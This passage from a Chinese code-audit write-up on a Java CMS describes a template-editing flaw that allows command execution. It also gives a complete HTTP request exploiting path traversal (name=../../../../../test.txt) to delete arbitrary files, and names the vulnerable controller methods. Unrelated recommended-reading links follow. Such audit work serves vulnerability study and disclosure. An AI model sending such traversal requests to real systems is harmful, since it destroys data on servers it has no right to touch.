output +=line;
}
response.setHeader("Content",output);
}
重启项目后,发送路由信息
文章插图
com.cms.controller.admin.TemplateController#update
文章插图
漏洞存在的原因是因为在更新代码的时候,没有对代码内容进行校验 , 可任意修改代码,写入恶意代码就会触发命令执行
授权任意文件删除
构造数据包
GET /admin/database/delete?name=../../../../../test.txt HTTP/1.1
Host: localhost:8888
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0(Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/85.0.4183.83Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=410D94FAA33FE9021AD6B0C3E842F9F9
Connection: close
文章插图
com.cms.controller.admin.DatabaseController#delete
文章插图
com.cms.utils.BackupUtils#delete
文章插图
推荐阅读
- 身材极速恢复!36岁香港知名女星产后复出赚奶粉钱,自曝想生二胎
- TVB童颜女神产后一个月极速复出,状态大勇,曾为保胎打近百支针
- 极速光轮介绍 极速光轮都有哪里有
- 香港知名女星患病女儿极速成长,12岁仍不会说话,多位至亲相继离世
- 360极速浏览器清除缓存怎么弄的
- 刘禅|六一儿童节将至,三款电玩皮肤即将上线,极速之王CG已经上线
- Apache Doris 极速数据湖分析技术细节公开!
- 哪个借款平台不查征信(贷款不查征信极速放款)
- 不查征信负债下款最快的平台(贷款不查征信极速放款)
- 极速僵尸结局什么意思 沐浴盐僵尸